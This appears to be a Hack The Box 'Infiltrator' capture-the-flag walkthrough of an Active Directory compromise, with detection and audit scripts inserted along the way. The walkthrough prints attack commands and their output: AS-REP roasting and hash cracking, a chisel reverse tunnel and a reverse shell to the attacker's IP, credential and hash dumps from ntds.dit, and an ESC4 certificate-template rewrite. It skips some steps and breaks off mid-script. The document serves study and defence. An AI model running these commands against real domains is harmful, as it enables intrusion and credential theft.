Infiltrator is an insane-difficulty machine from Hack The Box. The chain: information gathering on the website -> AS-REP roasting -> password spraying -> GenericAll on Marketing Digital -> password change for e.rodriguez -> AddSelf to Chiefs Marketing -> ForceChangePassword on Chiefs Marketing -> user flag -> Output Messenger forwarding to our machine -> credential exfiltration -> .NET application reversing -> Calendar feature command injection -> credential and file exfiltration from a pcap file -> BitLocker backup key to restore the file system -> NTDS info dumping -> ReadGMSAPassword on a service account -> exploit ESC4 to ESC1 for administrator access.
```
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
80/tcp   open  http          Microsoft IIS httpd 10.0
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Infiltrator.htb
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-06-13 09:53:07Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: infiltrator.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc01.infiltrator.htb, DNS:infiltrator.htb, DNS:INFILTRATOR
| Not valid before: 2024-08-04T18:48:15
|_Not valid after:  2099-07-17T18:48:15
|_ssl-date: 2025-06-13T09:54:43+00:00; -35s from scanner time.
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: infiltrator.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-06-13T09:54:43+00:00; -35s from scanner time.
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc01.infiltrator.htb, DNS:infiltrator.htb, DNS:INFILTRATOR
| Not valid before: 2024-08-04T18:48:15
|_Not valid after:  2099-07-17T18:48:15
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: infiltrator.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-06-13T09:54:43+00:00; -35s from scanner time.
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc01.infiltrator.htb, DNS:infiltrator.htb, DNS:INFILTRATOR
| Not valid before: 2024-08-04T18:48:15
|_Not valid after:  2099-07-17T18:48:15
3269/tcp open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: infiltrator.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-06-13T09:54:43+00:00; -35s from scanner time.
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc01.infiltrator.htb, DNS:infiltrator.htb, DNS:INFILTRATOR
| Not valid before: 2024-08-04T18:48:15
|_Not valid after:  2099-07-17T18:48:15
3389/tcp open  ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
|   Target_Name: INFILTRATOR
|   NetBIOS_Domain_Name: INFILTRATOR
|   NetBIOS_Computer_Name: DC01
|   DNS_Domain_Name: infiltrator.htb
|   DNS_Computer_Name: dc01.infiltrator.htb
|   DNS_Tree_Name: infiltrator.htb
|   Product_Version: 10.0.17763
|_  System_Time: 2025-06-13T09:54:10+00:00
| ssl-cert: Subject: commonName=dc01.infiltrator.htb
| Not valid before: 2025-06-03T14:17:24
|_Not valid after:  2025-12-03T14:17:24
|_ssl-date: 2025-06-13T09:54:43+00:00; -35s from scanner time.
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
```
We can also see the employees' full names on the website:

[Figure: Web Application]
From these names we can build username candidates in different formats and check which ones exist in the domain. https://github.com/urbanadventurer/username-anarchy.git generates all the common combinations, and indeed some of them are valid usernames:
```
[-] User d.anderson doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User o.martinez doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User k.turner doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User a.walker doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User m.harris doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User e.rodriguez doesn't have UF_DONT_REQUIRE_PREAUTH set
$krb5asrep$23$l[email protected]:594eea652373170981c08f7f28c67e88$eae6bd168ccd2697bf309e22bddc011fabceaff0c977c1fa9ec0b4f6f91762b4e1d3c3f30161e3b83c32abcd83727106b9d31d2e7c7f2ff3005f5d57609b23820b0b852e7376543862c0a4cca9a12302e16c903953a1e473f467a49813243a265ed077b2c0208182759c9de903c40f05a5985f77529861390a8bafbf6dbbd3e78b5d641d13d5bec912af15d8403bb99f22fcf7726df4c15dc7c0ec653b31dc79e96af6fb0195accdcf914c3fa1167352c4b67ae09fb06d6d5b51bd9b565fe6a59a5e0269ccdc9377d5161c4ce34aa7e7442388b33ed9c5eff15d733d9f6657be176f62d7a675575a6b343c4aaeb3759c6f9a
```
The l.clark user does have UF_DONT_REQUIRE_PREAUTH set, so the KDC hands us an AS-REP hash for that account, which we can crack offline:
```
┌──(kali㉿kali)-[~/hackthebox/infiltrator]
└─$ john --wordlist=/home/kali/Desktop/rockyou.txt hash.l.clark
Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 128/128 AVX 4x])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
WAT?watismypass! ($krb5asrep$23$l[email protected])
1g 0:00:00:09 DONE (2024-09-01 14:38) 0.1085g/s 1140Kp/s 1140Kc/s 1140KC/s WAYGATE..WASHI
Use the "--show" option to display all of the cracked passwords reliably
Session completed
```
We can now use those credentials to enumerate the domain with BloodHound:
```
┌──(kali㉿kali)-[~/]
└─$ bloodhound-python -d infiltrator.htb -c all -u l.clark -p 'WAT?watismypass!' -ns 10.10.11.31 --zip
INFO: Found AD domain: infiltrator.htb
INFO: Getting TGT for user
INFO: Connecting to LDAP server: dc01.infiltrator.htb
INFO: Kerberos auth to LDAP failed, trying NTLM
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc01.infiltrator.htb
INFO: Kerberos auth to LDAP failed, trying NTLM
INFO: Found 14 users
INFO: Found 58 groups
INFO: Found 2 gpos
INFO: Found 2 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: dc01.infiltrator.htb
WARNING: Failed to get service ticket for dc01.infiltrator.htb, falling back to NTLM auth
CRITICAL: CCache file is not found. Skipping...
INFO: Done in 01M 13S
INFO: Compressing output into 20250613101659_bloodhound.zip
```
We can also spray this password against the other users to check for password reuse:

And indeed d.anderson uses the same password.
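Both of the steps above (AS-REP roasting and password spraying) leave a recognisable trace on the domain controller, which is what a blue team would hunt for. The script below is an added detection sketch, not part of the original write-up or of any tool it mentions. It runs over constructed Windows Security event records (event ids 4768 and 4771 with their real field names TargetUserName, PreAuthType, TicketEncryptionType and IpAddress; the timestamps, accounts and addresses are made up) and reports two signals: a TGT issued with pre-authentication type 0 and RC4 (0x17) encryption, which is what GetNPUsers.py produces for a DONT_REQ_PREAUTH account, and one source address failing pre-authentication for many distinct accounts inside a short window, which is the spraying pattern.

```python
"""Detection sketch for AS-REP roasting and password spraying over
constructed Windows Security events (added example, not from the write-up)."""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample events in the shape a SIEM hands over (not real lab logs).
SAMPLE_EVENTS = [
    # TGT for l.clark issued without pre-auth, RC4 reply: roastable account being roasted
    {"id": 4768, "ts": "2025-06-13T09:55:01", "TargetUserName": "l.clark",
     "PreAuthType": "0", "TicketEncryptionType": "0x17", "IpAddress": "10.10.16.59"},
    # normal logon: pre-auth used, AES ticket
    {"id": 4768, "ts": "2025-06-13T09:55:05", "TargetUserName": "m.harris",
     "PreAuthType": "2", "TicketEncryptionType": "0x12", "IpAddress": "10.10.11.31"},
    # no pre-auth but AES reply: worth inventorying, but not the classic RC4 roast
    {"id": 4768, "ts": "2025-06-13T09:55:30", "TargetUserName": "svc_backup",
     "PreAuthType": "0", "TicketEncryptionType": "0x12", "IpAddress": "10.10.16.59"},
]
# Spray pattern: one source, six different accounts, one failure every five seconds.
for i, user in enumerate(["d.anderson", "o.martinez", "k.turner", "a.walker",
                          "m.harris", "e.rodriguez"]):
    SAMPLE_EVENTS.append({"id": 4771, "ts": f"2025-06-13T10:00:{i * 5:02d}",
                          "TargetUserName": user, "IpAddress": "10.10.16.59"})
# Benign noise: one user mistyping their own password twice.
SAMPLE_EVENTS += [
    {"id": 4771, "ts": "2025-06-13T10:05:00", "TargetUserName": "a.walker", "IpAddress": "10.10.20.7"},
    {"id": 4771, "ts": "2025-06-13T10:05:09", "TargetUserName": "a.walker", "IpAddress": "10.10.20.7"},
]


def _ts(event):
    return datetime.fromisoformat(event["ts"])


def asrep_roast_candidates(events):
    """Accounts whose TGT was issued with PreAuthType 0 and an RC4 (0x17) ticket."""
    return sorted({e["TargetUserName"] for e in events
                   if e["id"] == 4768 and e["PreAuthType"] == "0"
                   and e["TicketEncryptionType"] == "0x17"})


def password_spray_sources(events, min_accounts=5, window=timedelta(minutes=2)):
    """Source IPs that failed pre-auth for at least min_accounts distinct users
    within `window`; returns {ip: sorted list of targeted accounts}."""
    by_ip = defaultdict(list)
    for e in events:
        if e["id"] == 4771:
            by_ip[e["IpAddress"]].append(e)
    hits = {}
    for ip, evs in by_ip.items():
        evs.sort(key=_ts)
        for i, first in enumerate(evs):           # sliding window starting at each failure
            users = {x["TargetUserName"] for x in evs[i:] if _ts(x) - _ts(first) <= window}
            if len(users) >= min_accounts:
                hits[ip] = sorted(users)
                break
    return hits


if __name__ == "__main__":
    print("AS-REP roast candidates:", asrep_roast_candidates(SAMPLE_EVENTS))
    print("Spray sources:", password_spray_sources(SAMPLE_EVENTS))
```

The thresholds (five accounts in two minutes) are deliberately loose for a small domain; on the defensive side the cheaper fix is simply to clear the "Do not require Kerberos preauthentication" flag on every account that does not need it, which removes the roastable AS-REP entirely.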
So the exploitation path, as shown by the BloodHound graph, looks like this:

1. d.anderson has GenericAll on Marketing Digital.
2. Marketing Digital contains the e.rodriguez user.
3. e.rodriguez has AddSelf on Chiefs Marketing.
4. The Chiefs Marketing group has ForceChangePassword on m.harris.
5. Finally, m.harris can connect to the machine through WinRM.
```
┌──(kali㉿kali)-[~]
└─$ impacket-getTGT infiltrator.htb/m.harris:'WAT?watismypass!'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] Saving ticket in m.harris.ccache

┌──(kali㉿kali)-[~]
└─$ export KRB5CCNAME=m.harris.ccache

┌──(kali㉿kali)-[~]
└─$ evil-winrm -i dc01.infiltrator.htb -u "m.harris" -r INFILTRATOR.HTB

Evil-WinRM shell v3.7

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Warning: User is not needed for Kerberos auth. Ticket will be used

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\M.harris\Documents> cat ../desktop/user.txt
e0a9dc00956a436644e776addd860f4f
```
Privilege Escalation
Checking C:\Program Files, we see some interesting software, such as Output Messenger:

```
Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
d-----        12/4/2023   9:22 AM                Common Files
d-----        8/21/2024   1:50 PM                Hyper-V
d-----        2/19/2024   3:52 AM                internet explorer
d-----        2/23/2024   5:06 AM                Output Messenger
d-----         9/6/2024  12:19 PM                Output Messenger Server
d-----       12/12/2023  10:04 AM                PackageManagement
d-----        2/19/2024   4:16 AM                Update Services
d-----        12/4/2023   9:23 AM                VMware
d-r---        11/5/2022  12:03 PM                Windows Defender
d-----        8/21/2024   1:50 PM                Windows Defender Advanced Threat Protection
d-----        11/5/2022  12:03 PM                Windows Mail
d-----        8/21/2024   1:50 PM                Windows Media Player
d-----        9/15/2018  12:19 AM                Windows Multimedia Platform
d-----        9/15/2018  12:28 AM                windows nt
d-----        11/5/2022  12:03 PM                Windows Photo Viewer
d-----        9/15/2018  12:19 AM                Windows Portable Devices
d-----        9/15/2018  12:19 AM                Windows Security
d-----       12/12/2023  10:04 AM                WindowsPowerShell
```
But I cannot access that right now.
Taking a look at the open ports, we find several that belong to Output Messenger:

The Output Messenger docs list which port serves which function.
I can reach those ports from my machine through a SOCKS proxy set up with chisel:

```powershell
.\Chisel.exe client 10.10.16.59:8000 R:1080:socks
```

Going to / redirects us to /ombro/index.html, an instance of Output Messenger:

[Figure: Output Messenger]
There is also some kind of API on port 14125. Here I got stuck for a while until I noticed I had skipped some basic enumeration: enumerating users with netexec using l.clark's credentials reveals k.turner's password, MessengerApp@Pass!, which grants access to Output Messenger. Cycling through the emails I found some credentials:

[Figure: Output Messenger]

These are valid credentials for m.harris, which we use to log in as him and obtain this interesting UserExplorer.exe application:

[Figure: Output Messenger]
```
UserExplorer.exe: PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows, 3 sections
```
This is a .NET application, so we can open it with dotPeek to see what it holds for us.

Inside C:\Users\winrm_svc\AppData\Roaming\Output Messenger we find two files, OM.db3 and OT.db3, which we can download and inspect. OM.db3 contains some juicy data:
We can now log in to Output Messenger as winrm_svc, where we find an interesting email with credentials:

[Figure: Output Messenger]

Checking the Output Messenger docs again, we can see how to interact with the API mentioned earlier.
We'll now make this request, which returns a chat room's history in HTML format:

```bash
proxychains -q curl -H "API-KEY: 558R501T5I6024Y8JV3B7KOUN1A518GG" 'localhost:14125/api/chatrooms/[email protected]&fromdate=2023/01/01&todate=2024/09/01'
```
And now we have some more credentials:

[Figure: Output Messenger]

With these new credentials I can connect to Output Messenger, where I exploit a command execution in the Calendar feature: I upload my reverse shell to the box and set a Calendar action that executes it. And I am in:

```
$ rlwrap -cAr nc -lnvp 9001
Listening on 0.0.0.0 9001
Connection received on 10.10.11.31 60169
```
Looking deeper into the pcap file, I managed to find a 7z archive and credentials for o.martinez, which I validated with netexec:

[Figure: Output Messenger]

I'll crack the 7z archive with 7z2john; the password is zipper. Inside the archive is a BitLocker backup key, which we can use later:

[Figure: Output Messenger]

We now connect over RDP as o.martinez with the credentials we found and unlock the BitLocker volume with the backup key:

[Figure: Output Messenger]

Inside it we find a Backup_credentials.7z file, which contains the SAM and SECURITY hives we can use to dump secrets (the backup also carries the SYSTEM hive and ntds.dit, which secretsdump needs):
```
$ secretsdump.py -security registry/SECURITY -system registry/SYSTEM -ntds Active\ Directory/ntds.dit LOCAL
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] Target system bootKey: 0xd7e7d8797c1ccd58d95e4fb25cb7bdd4
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC
$MACHINE.ACC:plain_password_hex:4b90048ad6028aae98f66484009266d4efa571d48a8aa6b771d69d20aba16ddb7e0a0ffe9378a1ac7b31a812f0760fe2a8ce66ff6a0ff772155a29baa59b4407a95a920d0904cba6f8b19b6393f1551a476f991bbedaa66880e60611482a81b31b34c55c77d0e0d1792e3b18cdc9d39e0b776e7ef082399b096aaa2e8d93eb1f0340fd5f6e138da2580d1f581ff9426dce99a901a1bf88ad3f19a5bc4ce8ff17fdbb0a04bb29f13dc46177a6d8cd61bf91f8342e33b5362daecbb888df22ce467aa9f45a9dc69b03d116eeac89857d17f3f44f4abc34165b296a42b3b3ff5ab26401b5734fab6ad142d7882715927e45
$MACHINE.ACC: aad3b435b51404eeaad3b435b51404ee:fe4767309896203c581b9fc3c5e23b00
[*] DefaultPassword
(Unknown User):ROOT#123
[*] DPAPI_SYSTEM
dpapi_machinekey:0x81f5247051ff9535ad8299f0efd531ff3a5cb688
dpapi_userkey:0x79d13d91a01f6c38437c526396febaf8c1bc6909
[*] NL$KM
 0000   2E 8A EC D8 ED 12 C6 ED  26 8E B0 9B DF DA 42 B7   ........&.....B.
 0010   49 DA B0 07 05 EE EA 07  05 02 04 0E AD F7 13 C2   I...............
 0020   6C 6D 8E 19 1A B0 51 41  7C 7D 73 9E 99 BA CD B1   lm....QA|}s.....
 0030   B7 7A 3E 0F 59 50 1C AD  8F 14 62 84 3F AC A9 92   .z>.YP....b.?...
NL$KM:2e8aecd8ed12c6ed268eb09bdfda42b749dab00705eeea070502040eadf713c26c6d8e191ab051417c7d739e99bacdb1b77a3e0f59501cad8f1462843faca992
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Searching for pekList, be patient
[*] PEK # 0 found and decrypted: d27644ab3070f72ec264fcb413d75299
[*] Reading and decrypting hashes from Active Directory/ntds.dit
Administrator:500:aad3b435b51404eeaad3b435b51404ee:7bf62b9c45112ffdadb7b6b4b9299dd2:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DC$:1001:aad3b435b51404eeaad3b435b51404ee:fe4767309896203c581b9fc3c5e23b00:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:454fcbc37690c6e4628ab649e8e285a5:::
infiltrator.htb\winrm_svc:1104:aad3b435b51404eeaad3b435b51404ee:84287cd16341b91eb93a58456b73e30f:::
infiltrator.htb\lan_managment:1105:aad3b435b51404eeaad3b435b51404ee:e8ade553d9b0cb1769f429d897c92931:::
infiltrator.htb\M.harris:1106:aad3b435b51404eeaad3b435b51404ee:fc236589c448c620417b15597a3d3ca7:::
infiltrator.htb\D.anderson:1107:aad3b435b51404eeaad3b435b51404ee:627a2cb0adc7ba12ea11174941b3da88:::
infiltrator.htb\L.clark:1108:aad3b435b51404eeaad3b435b51404ee:627a2cb0adc7ba12ea11174941b3da88:::
infiltrator.htb\O.martinez:1109:aad3b435b51404eeaad3b435b51404ee:eb86d7bcb30c8eac1bdcae5061e2dff4:::
infiltrator.htb\A.walker:1110:aad3b435b51404eeaad3b435b51404ee:46389d8dfdfcf0cbe262a71f576e574b:::
infiltrator.htb\K.turner:1111:aad3b435b51404eeaad3b435b51404ee:48bcd1cdc870c6285376a990c2604531:::
infiltrator.htb\E.rodriguez:1112:aad3b435b51404eeaad3b435b51404ee:b1918c2ce6a62f4eee11c51b6e2e965a:::
[*] Kerberos keys from Active Directory/ntds.dit
DC$:aes256-cts-hmac-sha1-96:09b3e08f549e92e0b16ed45f84b25cc6d0c147ff169ce059811a3ed9e6957176
DC$:aes128-cts-hmac-sha1-96:d2a3d7c9ee6965b1e3cd710ed1ceed0f
DC$:des-cbc-md5:5eea34b3317aea91
krbtgt:aes256-cts-hmac-sha1-96:f6e0a1bd3a180f83472cd2666b28de969442b7745545afb84bbeaa9397cb9b87
krbtgt:aes128-cts-hmac-sha1-96:7874dff8138091d6c344381c9c758540
krbtgt:des-cbc-md5:10bfc49ecd3b58d9
infiltrator.htb\winrm_svc:aes256-cts-hmac-sha1-96:ae473ae7da59719ebeec93c93704636abb7ee7ff69678fdec129afe2fc1592c4
infiltrator.htb\winrm_svc:aes128-cts-hmac-sha1-96:0faf5e0205d6f43ae37020f79f60606a
infiltrator.htb\winrm_svc:des-cbc-md5:7aba231386c2ecf8
infiltrator.htb\lan_managment:aes256-cts-hmac-sha1-96:6fcd2f66179b6b852bb3cc30f2ba353327924081c47d09bc5a9fafc623016e96
infiltrator.htb\lan_managment:aes128-cts-hmac-sha1-96:48f45b8eb2cbd8dbf578241ee369ddd9
infiltrator.htb\lan_managment:des-cbc-md5:31c83197ab944052
infiltrator.htb\M.harris:aes256-cts-hmac-sha1-96:20433af8bf6734568f112129c951ad87f750dddf092648c80816d5cb42ed0f49
infiltrator.htb\M.harris:aes128-cts-hmac-sha1-96:2ee0cd05c3fa205a92e6837ff212b7a0
infiltrator.htb\M.harris:des-cbc-md5:3ee3688376f2e5ce
infiltrator.htb\D.anderson:aes256-cts-hmac-sha1-96:42447533e9f1c9871ddd2137def662980e677a748b5d184da910d3c4daeb403f
infiltrator.htb\D.anderson:aes128-cts-hmac-sha1-96:021e189e743a78a991616821138e2e69
infiltrator.htb\D.anderson:des-cbc-md5:1529a829132a2345
infiltrator.htb\L.clark:aes256-cts-hmac-sha1-96:dddc0366b026b09ebf0ac3e7a7f190b491c4ee0d7976a4c3b324445485bf1bfc
infiltrator.htb\L.clark:aes128-cts-hmac-sha1-96:5041c75e19de802e0f7614f57edc8983
infiltrator.htb\L.clark:des-cbc-md5:cd023d5d70e6aefd
infiltrator.htb\O.martinez:aes256-cts-hmac-sha1-96:4d2d8951c7d6eba4edaf172fd0f7b78ab7260e3d513bf2ff387c70c85d912a2f
infiltrator.htb\O.martinez:aes128-cts-hmac-sha1-96:33fdf738e13878a8101e3bf929a5a120
infiltrator.htb\O.martinez:des-cbc-md5:f80bc202755d2cfd
infiltrator.htb\A.walker:aes256-cts-hmac-sha1-96:e26c97600c6f44990f18480087a685e0f1c71bcfbc8413dce6764ccf77df448a
infiltrator.htb\A.walker:aes128-cts-hmac-sha1-96:768672b783131ed963b9deeac0a6d2e4
infiltrator.htb\A.walker:des-cbc-md5:a7e6cde06d6e153b
infiltrator.htb\K.turner:aes256-cts-hmac-sha1-96:2c816a32b395f67df520bc734f7ea8e4df64a9610ffb3ef43e0e9df69b9df8b8
infiltrator.htb\K.turner:aes128-cts-hmac-sha1-96:b20f41c0d3b8fb6e1b793af4a835109b
infiltrator.htb\K.turner:des-cbc-md5:4607b9eaec6838ba
infiltrator.htb\E.rodriguez:aes256-cts-hmac-sha1-96:9114030dd2a57970530eda4ce0aa6b14f88f2be44f6d920de31eb6ee6f1587b5
infiltrator.htb\E.rodriguez:aes128-cts-hmac-sha1-96:ddd37cf706781414885f561c3b469d0c
infiltrator.htb\E.rodriguez:des-cbc-md5:9d5bdaf2cd26165d
[*] Cleaning up...
```
Checking these hashes against the live domain, only l.clark's still works: `infiltrator.htb\L.clark:627a2cb0adc7ba12ea11174941b3da88`

NTDS.Sqlite is a tool that takes the information in the ntds.dit file and converts it into a SQLite database for easier enumeration. Running it here and querying the result gives us some juicy credentials sitting in a user's description field:
```
sqlite> select commonname,description from user_accounts ;
Administrator|Built-in account for administering the computer/domain
Guest|Built-in account for guest access to the computer/domain
krbtgt|Key Distribution Center Service Account
winrm_svc|User Security and Management Specialist
lan_managment|l@n_M@an!1331
M.harris|Head of Development Department
```
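A password in an account's description attribute is readable by every authenticated user over LDAP, so this is worth auditing proactively rather than discovering in a backup. The script below is an added example, not part of the write-up or of NTDS.Sqlite: it builds an in-memory SQLite table with the same two columns and the rows shown above (plus two constructed rows to exercise the keyword rule and an empty description), then scans every description for password-shaped content. Pointing `find_leaked_secrets` at a connection to a real NTDS.Sqlite output file audits a domain backup the same way; the table and column names follow the query above, everything else is an assumption of the example.

```python
"""Audit user_accounts.description for password-like values (added example)."""
import re
import sqlite3

# Rows as listed in the write-up's query output plus two constructed extras.
SAMPLE_ROWS = [
    ("Administrator", "Built-in account for administering the computer/domain"),
    ("Guest", "Built-in account for guest access to the computer/domain"),
    ("krbtgt", "Key Distribution Center Service Account"),
    ("winrm_svc", "User Security and Management Specialist"),
    ("lan_managment", "l@n_M@an!1331"),
    ("M.harris", "Head of Development Department"),
    ("svc_backup", "temp pwd: Summer2024"),   # constructed: keyword rule
    ("A.walker", None),                        # constructed: empty description
]

KEYWORDS = re.compile(r"\b(pass(word)?|pwd|passwd|cred(ential)?s?)\b", re.IGNORECASE)


def build_sample_db():
    """Create an in-memory SQLite DB shaped like NTDS.Sqlite's user_accounts table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE user_accounts (commonname TEXT, description TEXT)")
    conn.executemany("INSERT INTO user_accounts VALUES (?, ?)", SAMPLE_ROWS)
    return conn


def password_like_reason(description):
    """Return why a description looks like a stored secret, or None if it looks benign."""
    if not description:
        return None
    if KEYWORDS.search(description):
        return "mentions a password/credential keyword"
    for token in description.split():
        # A single token mixing letters, digits and symbols (other than the
        # slash, dot and hyphen common in ordinary text) reads like a password,
        # not like a job title.
        if (len(token) >= 8 and re.search(r"\d", token)
                and re.search(r"[A-Za-z]", token) and re.search(r"[^\w/.-]", token)):
            return f"password-shaped token {token!r}"
    return None


def find_leaked_secrets(conn):
    """Scan user_accounts and return (commonname, description, reason) for suspicious rows."""
    cur = conn.execute("SELECT commonname, description FROM user_accounts ORDER BY rowid")
    hits = []
    for cn, desc in cur:
        reason = password_like_reason(desc)
        if reason:
            hits.append((cn, desc, reason))
    return hits


if __name__ == "__main__":
    for cn, desc, reason in find_leaked_secrets(build_sample_db()):
        print(f"{cn}: {desc!r} ({reason})")
```

The heuristic errs on the side of flagging; the point is to produce a short review list, since the description attribute is world-readable inside the domain and the only real fix is to move the secret out of it and rotate it.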
```
$ certipy find -vulnerable -dc-ip 10.10.11.31 -u 'infiltrator_svc$' -hashes :9ae7de37439f359608eccf2cff5d32b9 -stdout
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Finding certificate templates
[*] Found 34 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 12 enabled certificate templates
[*] Trying to get CA configuration for 'infiltrator-DC01-CA' via CSRA
[!] Got error while trying to get CA configuration for 'infiltrator-DC01-CA' via CSRA: CASessionError: code: 0x80070005 - E_ACCESSDENIED - General access denied error.
[*] Trying to get CA configuration for 'infiltrator-DC01-CA' via RRP
[!] Failed to connect to remote registry. Service should be starting now. Trying again...
[*] Got CA configuration for 'infiltrator-DC01-CA'
[*] Enumeration output:
Certificate Authorities
  0
    CA Name                             : infiltrator-DC01-CA
    DNS Name                            : dc01.infiltrator.htb
    Certificate Subject                 : CN=infiltrator-DC01-CA, DC=infiltrator, DC=htb
    Certificate Serial Number           : 724BCC4E21EA6681495514E0FD8A5149
    Certificate Validity Start          : 2023-12-08 01:42:38+00:00
    Certificate Validity End            : 2124-08-04 18:55:57+00:00
    Web Enrollment                      : Disabled
    User Specified SAN                  : Disabled
    Request Disposition                 : Issue
    Enforce Encryption for Requests     : Enabled
    Permissions
      Owner                             : INFILTRATOR.HTB\Administrators
      Access Rights
        ManageCertificates              : INFILTRATOR.HTB\Administrators
                                          INFILTRATOR.HTB\Domain Admins
                                          INFILTRATOR.HTB\Enterprise Admins
        ManageCa                        : INFILTRATOR.HTB\Administrators
                                          INFILTRATOR.HTB\Domain Admins
                                          INFILTRATOR.HTB\Enterprise Admins
        Enroll                          : INFILTRATOR.HTB\Authenticated Users
Certificate Templates
  0
    Template Name                       : Infiltrator_Template
    Display Name                        : Infiltrator_Template
    Certificate Authorities             : infiltrator-DC01-CA
    Enabled                             : True
    Client Authentication               : True
    Enrollment Agent                    : False
    Any Purpose                         : False
    Enrollee Supplies Subject           : True
    Certificate Name Flag               : EnrolleeSuppliesSubject
    Enrollment Flag                     : PublishToDs
                                          PendAllRequests
                                          IncludeSymmetricAlgorithms
    Private Key Flag                    : ExportableKey
    Extended Key Usage                  : Smart Card Logon
                                          Server Authentication
                                          KDC Authentication
                                          Client Authentication
    Requires Manager Approval           : True
    Requires Key Archival               : False
    Authorized Signatures Required      : 1
    Validity Period                     : 99 years
    Renewal Period                      : 650430 hours
    Minimum RSA Key Length              : 2048
    Permissions
      Object Control Permissions
        Owner                           : INFILTRATOR.HTB\Local System
        Full Control Principals         : INFILTRATOR.HTB\Domain Admins
                                          INFILTRATOR.HTB\Enterprise Admins
                                          INFILTRATOR.HTB\Local System
        Write Owner Principals          : INFILTRATOR.HTB\infiltrator_svc
                                          INFILTRATOR.HTB\Domain Admins
                                          INFILTRATOR.HTB\Enterprise Admins
                                          INFILTRATOR.HTB\Local System
        Write Dacl Principals           : INFILTRATOR.HTB\infiltrator_svc
                                          INFILTRATOR.HTB\Domain Admins
                                          INFILTRATOR.HTB\Enterprise Admins
                                          INFILTRATOR.HTB\Local System
        Write Property Principals       : INFILTRATOR.HTB\infiltrator_svc
                                          INFILTRATOR.HTB\Domain Admins
                                          INFILTRATOR.HTB\Enterprise Admins
                                          INFILTRATOR.HTB\Local System
    [!] Vulnerabilities
      ESC4                              : 'INFILTRATOR.HTB\\infiltrator_svc' has dangerous permissions
```
Certipy flags Infiltrator_Template as vulnerable to ESC4: infiltrator_svc$ holds Write Owner, Write Dacl and Write Property over the template, so it can reconfigure the template and make it vulnerable to other ESC attacks. We'll do that with certipy now:

```
$ certipy template -u 'infiltrator_svc$' -hashes :9ae7de37439f359608eccf2cff5d32b9 -dc-ip 10.10.11.31 -template Infiltrator_Template -save-old
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Saved old configuration for 'Infiltrator_Template' to 'Infiltrator_Template.json'
[*] Updating certificate template 'Infiltrator_Template'
[*] Successfully updated 'Infiltrator_Template'
```
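An ESC4 finding deserves the same severity as ESC1, because write access to the template lets its holder remove every other safeguard (manager approval, required signatures, restricted enrollment) that would otherwise block ESC1. The auditor below is an added example, not from the write-up or from Certipy: it parses Certipy-style template output like the block above, reports ESC4 (non-privileged write principals) and ESC1 (client authentication, enrollee-supplied subject, no approval or signatures, low-privilege enrollment), and then re-evaluates the same template with the approval and signature requirements gone, which is the state the template is in after the `certipy template` command above. The trimmed template text, the Enrollment Rights line (not shown in the page's output), the rewritten enrollment principal and the privileged-group list are all constructed for the example.

```python
"""Audit Certipy-style template output for ESC4 and ESC1 (added example)."""

# Groups treated as privileged (assumption for the example).
PRIVILEGED = {"Domain Admins", "Enterprise Admins", "Administrators", "Local System"}

# Constructed, trimmed copy of the template block above. The Enrollment Rights
# line is an assumption: the page's output does not show it.
CERTIPY_TEMPLATE = """\
    Template Name                       : Infiltrator_Template
    Enabled                             : True
    Client Authentication               : True
    Enrollee Supplies Subject           : True
    Requires Manager Approval           : True
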